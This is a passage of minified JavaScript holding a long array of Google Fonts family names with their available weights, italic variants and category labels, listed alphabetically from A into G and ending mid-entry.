o=[{n:"ABeeZee",v:[400,"400i"],f:"sans-serif"},{n:"Abel",v:[400],f:"sans-serif"},{n:"Abhaya Libre",v:[400,500,600,700,800],f:"serif"},{n:"Abril Fatface",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Aclonica",v:[400],f:"sans-serif"},{n:"Acme",v:[400],f:"sans-serif"},{n:"Actor",v:[400],f:"sans-serif"},{n:"Adamina",v:[400],f:"serif"},{n:"Advent Pro",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aguafina Script",v:[400],f:"handwriting"},{n:"Akaya Kanadaka",v:[400],f:"display"},{n:"Akaya Telivigala",v:[400],f:"display"},{n:"Akronim",v:[400],f:"display"},{n:"Akshar",v:["300",400,500,600,700],f:"sans-serif"},{n:"Aladin",v:[400],f:"handwriting"},{n:"Alata",v:[400],f:"sans-serif"},{n:"Alatsi",v:[400],f:"sans-serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Aldrich",v:[400],f:"sans-serif"},{n:"Alef",v:[400,700],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alegreya",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Alegreya SC",v:[400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Alegreya Sans",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Alegreya Sans SC",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Aleo",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Alex Brush",v:[400],f:"handwriting"},{n:"Alfa Slab One",v:[400],f:"display"},{n:"Alice",v:[400],f:"serif"},{n:"Alike",v:[400],f:"serif"},{n:"Alike Angular",v:[400],f:"serif"},{n:"Allan",v:[400,700],f:"display"},{n:"Allerta",v:[400],f:"sans-serif"},{n:"Allerta Stencil",v:[400],f:"sans-serif"},{n:"Allison",v:[400],f:"handwriting"},{n:"Allura",v:[400],f:"handwriting"},{n:"Almarai",v:["300",400,700,800],f:"sans-serif"},{n:"Almendra",v:[400,"400i",700,"700i"],f:"serif"},{n:"Almendra Display",v:[400],f:"display"},{n:"Almendra SC",v:[400],f:"serif"},{n:"Alumni Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alumni Sans Inline One",v:[400,"400i"],f:"display"},{n:"Amarante",v:[400],f:"display"},{n:"Amaranth",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Amatic SC",v:[400,700],f:"handwriting"},{n:"Amethysta",v:[400],f:"serif"},{n:"Amiko",v:[400,600,700],f:"sans-serif"},{n:"Amiri",v:[400,"400i",700,"700i"],f:"serif"},{n:"Amita",v:[400,700],f:"handwriting"},{n:"Anaheim",v:[400],f:"sans-serif"},{n:"Andada Pro",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Andika",v:[400],f:"sans-serif"},{n:"Anek Bangla",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Devanagari",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gujarati",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Gurmukhi",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Kannada",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Latin",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Malayalam",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Odia",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Tamil",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Anek Telugu",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Angkor",v:[400],f:"display"},{n:"Annie Use Your Telescope",v:[400],f:"handwriting"},{n:"Anonymous Pro",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Antic",v:[400],f:"sans-serif"},{n:"Antic Didone",v:[400],f:"serif"},{n:"Antic Slab",v:[400],f:"serif"},{n:"Anton",v:[400],f:"sans-serif"},{n:"Antonio",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Anybody",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Arapey",v:[400,"400i"],f:"serif"},{n:"Arbutus",v:[400],f:"display"},{n:"Arbutus Slab",v:[400],f:"serif"},{n:"Architects Daughter",v:[400],f:"handwriting"},{n:"Archivo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Archivo Black",v:[400],f:"sans-serif"},{n:"Archivo Narrow",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Are You Serious",v:[400],f:"handwriting"},{n:"Aref Ruqaa",v:[400,700],f:"serif"},{n:"Arimo",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Arizonia",v:[400],f:"handwriting"},{n:"Armata",v:[400],f:"sans-serif"},{n:"Arsenal",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Artifika",v:[400],f:"serif"},{n:"Arvo",v:[400,"400i",700,"700i"],f:"serif"},{n:"Arya",v:[400,700],f:"sans-serif"},{n:"Asap",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Asap Condensed",v:[200,"200i",300,"300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Asar",v:[400],f:"serif"},{n:"Asset",v:[400],f:"display"},{n:"Assistant",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Astloch",v:[400,700],f:"display"},{n:"Asul",v:[400,700],f:"sans-serif"},{n:"Athiti",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Atkinson Hyperlegible",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Atma",v:["300",400,500,600,700],f:"display"},{n:"Atomic Age",v:[400],f:"display"},{n:"Aubrey",v:[400],f:"display"},{n:"Audiowide",v:[400],f:"display"},{n:"Autour One",v:[400],f:"display"},{n:"Average",v:[400],f:"serif"},{n:"Average Sans",v:[400],f:"sans-serif"},{n:"Averia Gruesa Libre",v:[400],f:"display"},{n:"Averia Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Sans Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Averia Serif Libre",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Azeret Mono",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Aboreto",v:[400],f:"display"},{n:"Abyssinica SIL",v:[400],f:"serif"},{n:"Albert Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Alexandria",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Alkalami",v:[400],f:"serif"},{n:"Alkatra",v:[400,500,600,700],f:"display"},{n:"Alumni Sans Collegiate One",v:[400,"400i"],f:"sans-serif"},{n:"Alumni Sans Pinstripe",v:[400,"400i"],f:"sans-serif"},{n:"Amiri Quran",v:[400],f:"serif"},{n:"Anuphan",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Aoboshi One",v:[400],f:"serif"},{n:"Aref Ruqaa Ink",v:[400,700],f:"serif"},{n:"Arima",v:[100,200,300,400,500,600,700],f:"display"},{n:"B612",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"B612 Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"BIZ UDGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDMincho",v:[400,700],f:"serif"},{n:"BIZ UDPGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDPMincho",v:[400,700],f:"serif"},{n:"Babylonica",v:[400],f:"handwriting"},{n:"Bad Script",v:[400],f:"handwriting"},{n:"Bahiana",v:[400],f:"display"},{n:"Bahianita",v:[400],f:"display"},{n:"Bai Jamjuree",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Bakbak One",v:[400],f:"display"},{n:"Ballet",v:[400],f:"handwriting"},{n:"Baloo 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhai 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaijaan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaina 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Chettan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Da 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Paaji 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tamma 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tammudu 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Thambi 2",v:[400,500,600,700,800],f:"display"},{n:"Balsamiq Sans",v:[400,"400i",700,"700i"],f:"display"},{n:"Balthazar",v:[400],f:"serif"},{n:"Bangers",v:[400],f:"display"},{n:"Barlow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Semi Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barriecito",v:[400],f:"display"},{n:"Barrio",v:[400],f:"display"},{n:"Basic",v:[400],f:"sans-serif"},{n:"Baskervville",v:[400,"400i"],f:"serif"},{n:"Battambang",v:["100","300",400,700,900],f:"display"},{n:"Baumans",v:[400],f:"display"},{n:"Bayon",v:[400],f:"sans-serif"},{n:"Be Vietnam Pro",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Beau Rivage",v:[400],f:"handwriting"},{n:"Bebas Neue",v:[400],f:"sans-serif"},{n:"Belgrano",v:[400],f:"serif"},{n:"Bellefair",v:[400],f:"serif"},{n:"Belleza",v:[400],f:"sans-serif"},{n:"Bellota",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Bellota Text",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"BenchNine",v:["300",400,700],f:"sans-serif"},{n:"Benne",v:[400],f:"serif"},{n:"Bentham",v:[400],f:"serif"},{n:"Berkshire Swash",v:[400],f:"handwriting"},{n:"Besley",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Beth Ellen",v:[400],f:"handwriting"},{n:"Bevan",v:[400,"400i"],f:"display"},{n:"BhuTuka Expanded One",v:[400],f:"display"},{n:"Big Shoulders Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Bigelow Rules",v:[400],f:"display"},{n:"Bigshot One",v:[400],f:"display"},{n:"Bilbo",v:[400],f:"handwriting"},{n:"Bilbo Swash Caps",v:[400],f:"handwriting"},{n:"BioRhyme",v:["200","300",400,700,800],f:"serif"},{n:"BioRhyme Expanded",v:["200","300",400,700,800],f:"serif"},{n:"Birthstone",v:[400],f:"handwriting"},{n:"Birthstone Bounce",v:[400,500],f:"handwriting"},{n:"Biryani",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bitter",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Black And White Picture",v:[400],f:"sans-serif"},{n:"Black Han Sans",v:[400],f:"sans-serif"},{n:"Black Ops One",v:[400],f:"display"},{n:"Blinker",v:["100","200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bodoni Moda",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Bokor",v:[400],f:"display"},{n:"Bona Nova",v:[400,"400i",700],f:"serif"},{n:"Bonbon",v:[400],f:"handwriting"},{n:"Bonheur Royale",v:[400],f:"handwriting"},{n:"Boogaloo",v:[400],f:"display"},{n:"Bowlby One",v:[400],f:"display"},{n:"Bowlby One SC",v:[400],f:"display"},{n:"Brawler",v:[400,700],f:"serif"},{n:"Bree Serif",v:[400],f:"serif"},{n:"Brygada 1918",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Bubblegum Sans",v:[400],f:"display"},{n:"Bubbler One",v:[400],f:"sans-serif"},{n:"Buda",v:["300"],f:"display"},{n:"Buenard",v:[400,700],f:"serif"},{n:"Bungee",v:[400],f:"display"},{n:"Bungee Hairline",v:[400],f:"display"},{n:"Bungee Inline",v:[400],f:"display"},{n:"Bungee Outline",v:[400],f:"display"},{n:"Bungee Shade",v:[400],f:"display"},{n:"Butcherman",v:[400],f:"display"},{n:"Butterfly Kids",v:[400],f:"handwriting"},{n:"Blaka",v:[400],f:"display"},{n:"Blaka Hollow",v:[400],f:"display"},{n:"Blaka Ink",v:[400],f:"display"},{n:"Braah One",v:[400],f:"sans-serif"},{n:"Bruno Ace",v:[400],f:"display"},{n:"Bruno Ace SC",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Cabin",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cabin Condensed",v:[400,500,600,700],f:"sans-serif"},{n:"Cabin Sketch",v:[400,700],f:"display"},{n:"Caesar Dressing",v:[400],f:"display"},{n:"Cagliostro",v:[400],f:"sans-serif"},{n:"Cairo",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caladea",v:[400,"400i",700,"700i"],f:"serif"},{n:"Calistoga",v:[400],f:"display"},{n:"Calligraffitti",v:[400],f:"handwriting"},{n:"Cambay",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cambo",v:[400],f:"serif"},{n:"Candal",v:[400],f:"sans-serif"},{n:"Cantarell",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cantata One",v:[400],f:"serif"},{n:"Cantora One",v:[400],f:"sans-serif"},{n:"Capriola",v:[400],f:"sans-serif"},{n:"Caramel",v:[400],f:"handwriting"},{n:"Carattere",v:[400],f:"handwriting"},{n:"Cardo",v:[400,"400i",700],f:"serif"},{n:"Carme",v:[400],f:"sans-serif"},{n:"Carrois Gothic",v:[400],f:"sans-serif"},{n:"Carrois Gothic SC",v:[400],f:"sans-serif"},{n:"Carter One",v:[400],f:"display"},{n:"Castoro",v:[400,"400i"],f:"serif"},{n:"Catamaran",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caudex",v:[400,"400i",700,"700i"],f:"serif"},{n:"Caveat",v:[400,500,600,700],f:"handwriting"},{n:"Caveat Brush",v:[400],f:"handwriting"},{n:"Cedarville Cursive",v:[400],f:"handwriting"},{n:"Ceviche One",v:[400],f:"display"},{n:"Chakra Petch",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Changa",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Changa One",v:[400,"400i"],f:"display"},{n:"Chango",v:[400],f:"display"},{n:"Charm",v:[400,700],f:"handwriting"},{n:"Charmonman",v:[400,700],f:"handwriting"},{n:"Chathura",v:["100","300",400,700,800],f:"sans-serif"},{n:"Chau Philomene One",v:[400,"400i"],f:"sans-serif"},{n:"Chela One",v:[400],f:"display"},{n:"Chelsea Market",v:[400],f:"display"},{n:"Chenla",v:[400],f:"display"},{n:"Cherish",v:[400],f:"handwriting"},{n:"Cherry Cream Soda",v:[400],f:"display"},{n:"Cherry Swash",v:[400,700],f:"display"},{n:"Chewy",v:[400],f:"display"},{n:"Chicle",v:[400],f:"display"},{n:"Chilanka",v:[400],f:"handwriting"},{n:"Chivo",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Chonburi",v:[400],f:"display"},{n:"Cinzel",v:[400,500,600,700,800,900],f:"serif"},{n:"Cinzel Decorative",v:[400,700,900],f:"display"},{n:"Clicker Script",v:[400],f:"handwriting"},{n:"Coda",v:[400,800],f:"display"},{n:"Coda Caption",v:[800],f:"sans-serif"},{n:"Codystar",v:["300",400],f:"display"},{n:"Coiny",v:[400],f:"display"},{n:"Combo",v:[400],f:"display"},{n:"Comfortaa",v:["300",400,500,600,700],f:"display"},{n:"Comforter",v:[400],f:"handwriting"},{n:"Comforter Brush",v:[400],f:"handwriting"},{n:"Comic Neue",v:["300","300i",400,"400i",700,"700i"],f:"handwriting"},{n:"Coming Soon",v:[400],f:"handwriting"},{n:"Commissioner",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Concert One",v:[400],f:"display"},{n:"Condiment",v:[400],f:"handwriting"},{n:"Content",v:[400,700],f:"display"},{n:"Contrail One",v:[400],f:"display"},{n:"Convergence",v:[400],f:"sans-serif"},{n:"Cookie",v:[400],f:"handwriting"},{n:"Copse",v:[400],f:"serif"},{n:"Corben",v:[400,700],f:"display"},{n:"Corinthia",v:[400,700],f:"handwriting"},{n:"Cormorant",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Cormorant Garamond",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant Infant",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant SC",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Unicase",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Upright",v:["300",400,500,600,700],f:"serif"},{n:"Courgette",v:[400],f:"handwriting"},{n:"Courier Prime",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Cousine",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Coustard",v:[400,900],f:"serif"},{n:"Covered By Your Grace",v:[400],f:"handwriting"},{n:"Crafty Girls",v:[400],f:"handwriting"},{n:"Creepster",v:[400],f:"display"},{n:"Crete Round",v:[400,"400i"],f:"serif"},{n:"Crimson Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Croissant One",v:[400],f:"display"},{n:"Crushed",v:[400],f:"display"},{n:"Cuprum",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cute Font",v:[400],f:"display"},{n:"Cutive",v:[400],f:"serif"},{n:"Cutive Mono",v:[400],f:"monospace"},{n:"Cairo Play",v:[200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Carlito",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Castoro Titling",v:[400],f:"display"},{n:"Charis SIL",v:[400,"400i",700,"700i"],f:"serif"},{n:"Cherry Bomb One",v:[400],f:"display"},{n:"Chivo Mono",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Chokokutai",v:[400],f:"display"},{n:"Climate Crisis",v:[400],f:"display"},{n:"Comme",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Crimson Text",v:[400,"400i",600,"600i",700,"700i"],f:"serif"},{n:"DM Mono",v:["300","300i",400,"400i",500,"500i"],f:"monospace"},{n:"DM Sans",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"DM Serif Display",v:[400,"400i"],f:"serif"},{n:"DM Serif Text",v:[400,"400i"],f:"serif"},{n:"Damion",v:[400],f:"handwriting"},{n:"Dancing Script",v:[400,500,600,700],f:"handwriting"},{n:"Dangrek",v:[400],f:"display"},{n:"Darker Grotesque",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"David Libre",v:[400,500,700],f:"serif"},{n:"Dawning of a New Day",v:[400],f:"handwriting"},{n:"Days One",v:[400],f:"sans-serif"},{n:"Dekko",v:[400],f:"handwriting"},{n:"Dela Gothic One",v:[400],f:"display"},{n:"Delius",v:[400],f:"handwriting"},{n:"Delius Swash Caps",v:[400],f:"handwriting"},{n:"Delius Unicase",v:[400,700],f:"handwriting"},{n:"Della Respira",v:[400],f:"serif"},{n:"Denk One",v:[400],f:"sans-serif"},{n:"Devonshire",v:[400],f:"handwriting"},{n:"Dhurjati",v:[400],f:"sans-serif"},{n:"Didact Gothic",v:[400],f:"sans-serif"},{n:"Diplomata",v:[400],f:"display"},{n:"Diplomata SC",v:[400],f:"display"},{n:"Do Hyeon",v:[400],f:"sans-serif"},{n:"Dokdo",v:[400],f:"handwriting"},{n:"Domine",v:[400,500,600,700],f:"serif"},{n:"Donegal One",v:[400],f:"serif"},{n:"Dongle",v:["300",400,700],f:"sans-serif"},{n:"Doppio One",v:[400],f:"sans-serif"},{n:"Dorsa",v:[400],f:"sans-serif"},{n:"Dosis",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"DotGothic16",v:[400],f:"sans-serif"},{n:"Dr Sugiyama",v:[400],f:"handwriting"},{n:"Duru Sans",v:[400],f:"sans-serif"},{n:"Dynalight",v:[400],f:"display"},{n:"Darumadrop One",v:[400],f:"display"},{n:"Delicious Handrawn",v:[400],f:"handwriting"},{n:"DynaPuff",v:[400,500,600,700],f:"display"},{n:"Edu NSW ACT Foundation",v:[400,500,600,700],f:"handwriting"},{n:"EB Garamond",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Eagle Lake",v:[400],f:"handwriting"},{n:"East Sea Dokdo",v:[400],f:"handwriting"},{n:"Eater",v:[400],f:"display"},{n:"Economica",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Eczar",v:[400,500,600,700,800],f:"serif"},{n:"El Messiri",v:[400,500,600,700],f:"sans-serif"},{n:"Electrolize",v:[400],f:"sans-serif"},{n:"Elsie",v:[400,900],f:"display"},{n:"Elsie Swash Caps",v:[400,900],f:"display"},{n:"Emblema One",v:[400],f:"display"},{n:"Emilys Candy",v:[400],f:"display"},{n:"Encode Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans SC",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Engagement",v:[400],f:"handwriting"},{n:"Englebert",v:[400],f:"sans-serif"},{n:"Enriqueta",v:[400,500,600,700],f:"serif"},{n:"Ephesis",v:[400],f:"handwriting"},{n:"Epilogue",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Erica One",v:[400],f:"display"},{n:"Esteban",v:[400],f:"serif"},{n:"Estonia",v:[400],f:"handwriting"},{n:"Euphoria Script",v:[400],f:"handwriting"},{n:"Ewert",v:[400],f:"display"},{n:"Exo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Exo 2",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Expletus Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"display"},{n:"Explora",v:[400],f:"handwriting"},{n:"Edu QLD Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu SA Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu TAS Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu VIC WA NT Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Fahkwang",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Familjen Grotesk",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Fanwood Text",v:[400,"400i"],f:"serif"},{n:"Farro",v:["300",400,500,700],f:"sans-serif"},{n:"Farsan",v:[400],f:"display"},{n:"Fascinate",v:[400],f:"display"},{n:"Fascinate Inline",v:[400],f:"display"},{n:"Faster One",v:[400],f:"display"},{n:"Fasthand",v:[400],f:"display"},{n:"Fauna One",v:[400],f:"serif"},{n:"Faustina",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Federant",v:[400],f:"display"},{n:"Federo",v:[400],f:"sans-serif"},{n:"Felipa",v:[400],f:"handwriting"},{n:"Fenix",v:[400],f:"serif"},{n:"Festive",v:[400],f:"handwriting"},{n:"Finger Paint",v:[400],f:"display"},{n:"Fira Code",v:["300",400,500,600,700],f:"monospace"},{n:"Fira Mono",v:[400,500,700],f:"monospace"},{n:"Fira Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Extra Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fjalla One",v:[400],f:"sans-serif"},{n:"Fjord One",v:[400],f:"serif"},{n:"Flamenco",v:["300",400],f:"display"},{n:"Flavors",v:[400],f:"display"},{n:"Fleur De Leah",v:[400],f:"handwriting"},{n:"Flow Block",v:[400],f:"display"},{n:"Flow Circular",v:[400],f:"display"},{n:"Flow Rounded",v:[400],f:"display"},{n:"Fondamento",v:[400,"400i"],f:"handwriting"},{n:"Fontdiner Swanky",v:[400],f:"display"},{n:"Forum",v:[400],f:"display"},{n:"Francois One",v:[400],f:"sans-serif"},{n:"Frank Ruhl Libre",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Fraunces",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Freckle Face",v:[400],f:"display"},{n:"Fredericka the Great",v:[400],f:"display"},{n:"Fredoka",v:["300",400,500,600,700],f:"sans-serif"},{n:"Freehand",v:[400],f:"display"},{n:"Fresca",v:[400],f:"sans-serif"},{n:"Frijole",v:[400],f:"display"},{n:"Fruktur",v:[400,"400i"],f:"display"},{n:"Fugaz One",v:[400],f:"display"},{n:"Fuggles",v:[400],f:"handwriting"},{n:"Fuzzy Bubbles",v:[400,700],f:"handwriting"},{n:"Figtree",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Finlandica",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Foldit",v:[100,200,300,400,500,600,700,800,900],f:"display"},{n:"Fragment Mono",v:[400,"400i"],f:"monospace"},{n:"GFS Didot",v:[400],f:"serif"},{n:"GFS Neohellenic",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Gabriela",v:[400],f:"serif"},{n:"Gaegu",v:["300",400,700],f:"handwriting"},{n:"Gafata",v:[400],f:"sans-serif"},{n:"Galada",v:[400],f:"display"},{n:"Galdeano",v:[400],f:"sans-serif"},{n:"Galindo",v:[400],f:"display"},{n:"Gamja Flower",v:[400],f:"handwriting"},{n:"Gayathri",v:["100",400,700],f:"sans-serif"},{n:"Gelasio",v:[400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Gemunu Libre",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Genos",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geo",v:[400,"400i"],f:"sans-serif"},{n:"Georama",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geostar",v:[400],f:"display"},{n:"Geostar Fill",v:[400],f:"display"},{n:"Germania One",v:[400],f:"display"},{n:"Gideon Roman",v:[400],f:"display"},{n:"Gidugu",v:[400],f:"sans-serif"},{n:"Gilda Display",v:[400],f:"serif"},{n:"Girassol",v:[400],f:"display"},{n:"Give You Glory",v:[400],f:"handwriting"},{n:"Glass Antiqua",v:[400],f:"display"},{n:"Glegoo",v:[400,700],f:"serif"},{n:"Gloria Hallelujah",v:[400],f:"handwriting"},{n:"Glory",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Gluten",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Goblin One",v:[400],f:"display"},{n:"Gochi Hand",v:[400],f:"handwriting"},{n:"Goldman",v:[400,700],f:"display"},{n:"Gorditas",v:[400,700],f:"display"},{n:"Gothic 